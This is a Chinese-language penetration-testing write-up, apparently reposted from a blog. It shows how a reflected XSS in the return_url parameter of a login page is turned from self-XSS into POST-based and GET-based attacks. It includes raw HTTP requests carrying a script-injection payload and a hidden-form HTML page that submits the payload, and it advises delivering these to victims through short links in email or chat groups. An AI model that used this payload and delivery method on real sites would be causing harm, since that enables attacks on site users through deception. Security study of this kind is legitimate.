目录
反射型 Self-XSS
POST 反射型 XSS
GET 反射型 XSS
反射型 Self-XSS
开局登录框

随机输入,然后burp抓包
POST /membership_login.asp HTTP/1.1Host:User-Agent:Accept: text/html,application/xhtml+xml,application/xmlAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HKAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: closeUpgrade-Insecure-Requests: 1return_url=&account=x&password=x&login=
发现一枚比较"陌生"的参数
return_url
fuzz一波
得到payload
"><script>alert(2021)</script>
即
POST /membership_login.asp HTTP/1.1Host:User-Agent:Accept: text/html,application/xhtml+xml,application/xmlAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HKAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: closeUpgrade-Insecure-Requests: 1return_url="><script>alert(2021)</script>&account=x&password=x&login=
响应如下

成功xss 自己

但总不能一枚self-xss就结束了吧?
POST-反射型 XSS
F12, 查看源码

构造post表单
xssPost.html:
<html><body><form action="http://www.xxx.com/membership_login.asp" method="POST"><input type="hidden" name="return_url" value=""><script>alert(2021)</script>" ><input type="hidden" name="account" value="x" ><input type="hidden" name="password" value="x" ><input type="hidden" name="login" value="" ><input type="submit" value="Submit request" ></form></body></html>
诱导目标访问这个html文件,触发如下:

如果是在日常攻防演练中,可以将该html部署在vps, 然后生成短链接后再进行投递,如:
起一个web服务

生成短链接

然后模拟投递该短链接(邮箱/QQ群/微信群等)

成功触发

虽然,针对POST 型XSS的利用已经较为成熟,但是如果能进化为GET 型XSS自然最好。
GET-反射型XSS
初始登录时的数据如下
POST membership_login.asp HTTP/1.1Host:User-Agent:Accept: text/html,application/xhtml+xml,application/xmlAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HKAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: closeUpgrade-Insecure-Requests: 1return_url=&account=x&password=x&login=
右键,改变请求方式

GET 请求包
GET /membership_login.asp?return_url="><script>alert(2021)</script>&account=x&password=x&login= HTTP/1.1Host:User-Agent:Accept: text/html,application/xhtml+xml,application/xmlAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HKAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: closeUpgrade-Insecure-Requests: 1
响应如下

成功弹窗

常规利用同POST 型XSS一样,将携带payload的链接丢短链接在线生成网站

然后将生成的链接投递即可,触发如下:

文章转载自pen4uin,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。




